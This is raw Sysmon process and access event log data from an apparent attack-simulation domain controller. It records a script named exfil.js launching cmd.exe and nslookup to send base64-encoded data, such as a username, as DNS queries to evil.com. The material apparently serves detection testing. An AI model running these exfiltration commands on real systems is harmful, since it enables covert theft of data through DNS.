14:21:37.560{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.560{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.560{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.544{2E1864BB-18F1-629A-7D44-000000005F02}9248080C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-7F44-000000005F02}7840C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.559{2E1864BB-18F1-629A-7F44-000000005F02}7840C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-7D44-000000005F02}924C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzmddg.tmp 2>&1 10341000x8000000000000000211067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.529{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7E44-000000005F02}6180C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.529{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7E44-000000005F02}6180C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.513{2E1864BB-18F1-629A-7E44-000000005F02}61806928C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7D44-000000005F02}924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.513{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7E44-000000005F02}6180C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.497{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.497{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7D44-000000005F02}924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.497{2E1864BB-18E0-629A-6742-000000005F02}39766076C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-7D44-000000005F02}924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.506{2E1864BB-18F1-629A-7D44-000000005F02}924C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzmddg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.497{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwrm.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000211055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50874- 354300x8000000000000000211054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50873- 354300x8000000000000000211053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50872- 354300x8000000000000000211052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.009{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50871- 354300x8000000000000000211051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.009{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50870- 354300x8000000000000000211050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.009{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50869- 354300x8000000000000000211049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.942{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50868- 354300x8000000000000000211048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.870{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50867- 354300x8000000000000000211047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.870{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50866- 354300x8000000000000000211046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.869{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50865- 10341000x8000000000000000211045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.482{2E1864BB-18F1-629A-7B44-000000005F02}75527568C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7C44-000000005F02}512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.480{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.480{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.479{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.479{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7C44-000000005F02}512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.479{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.479{2E1864BB-18F1-629A-7A44-000000005F02}45803212C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-7C44-000000005F02}512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.478{2E1864BB-18F1-629A-7C44-000000005F02}512C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-7A44-000000005F02}4580C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwrm.tmp 2>&1 10341000x8000000000000000211037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.460{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7B44-000000005F02}7552C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.460{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-7B44-000000005F02}7552C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.444{2E1864BB-18F1-629A-7B44-000000005F02}75527568C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7A44-000000005F02}4580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 